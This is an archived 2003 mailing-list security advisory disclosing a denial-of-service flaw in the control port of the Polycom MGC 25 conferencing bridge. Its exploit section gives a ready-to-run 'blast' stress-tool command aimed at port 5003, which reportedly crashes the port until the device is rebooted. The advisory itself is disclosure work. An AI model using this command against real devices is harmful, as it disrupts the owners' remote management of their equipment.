lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Message-ID: <20030712203137.90038.qmail@www.boxfrog.com>
Date: Sat, 12 Jul 2003 15:31:27 -0500
From: ident@...frog.com
To: bugtraq@...urityfocus.com, full-disclosure@...ts.netsys.com
Subject: DoS - Polycom MGC 25 Control Port


 ------------------------------------------------------------------
         - EXPL-A-2003-014 exploitlabs.com Advisory 014
 ------------------------------------------------------------------
                        -= Polycom MGC25 =- 

 


Nutcase
July 12, 2003 


Vunerability(s):
 ----------------
Denial of Service 


Product:
 --------
Polycom MGC 25  -  MCU Ver: 5.51.21
Polycom MGC 25  -  MCMS Ver : 5.51.211 ( current )
Polycom MGC 50  -  unverified
Polycom MGC 100 -  unverified 


Description of product:
 -----------------------
"The MGC 25 is a robust Multipoint Video and Audio bridge
for organizations with a distributed network, a centralized network or both.
All three platforms ( MGC-25 MGC-50 MGC-100 )
use the same software, share a common feature set and support
the same scheduling and management solutions." 

http://www.polycom.com/common/flash/individual_tours/I_MGC25.htm
http://www.polycom.com/common/pw_item_show_doc/0,1449,853,00.pdf 

 

VUNERABILITY / EXPLOIT
====================== 

tested on Windows XP / 2k 

issuing... 

blast 10.10.10.10 5003 600 680 /t 7000 /d 300 /b user 

( blast is a stress tool from http://www.foundstone.com/Blast ) 

completly crashes the control port on the remote host 

Box must be rebooted to return remote management functionality 


Local:
 ------
yes 

Remote:
 -------
yes 


Vendor Fix:
 -----------
No fix on 0day
Vendor has not responded 


Vendor Contact:
 ---------------
Concurrent with this advisory
securitycenter@...ycom.com 


Credits:
 --------
Nutcase
id3nt@...frog.com
http://exploitlabs.com 


exploitlabs.com and nothackers.org thanks Nutcase for his contribution

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ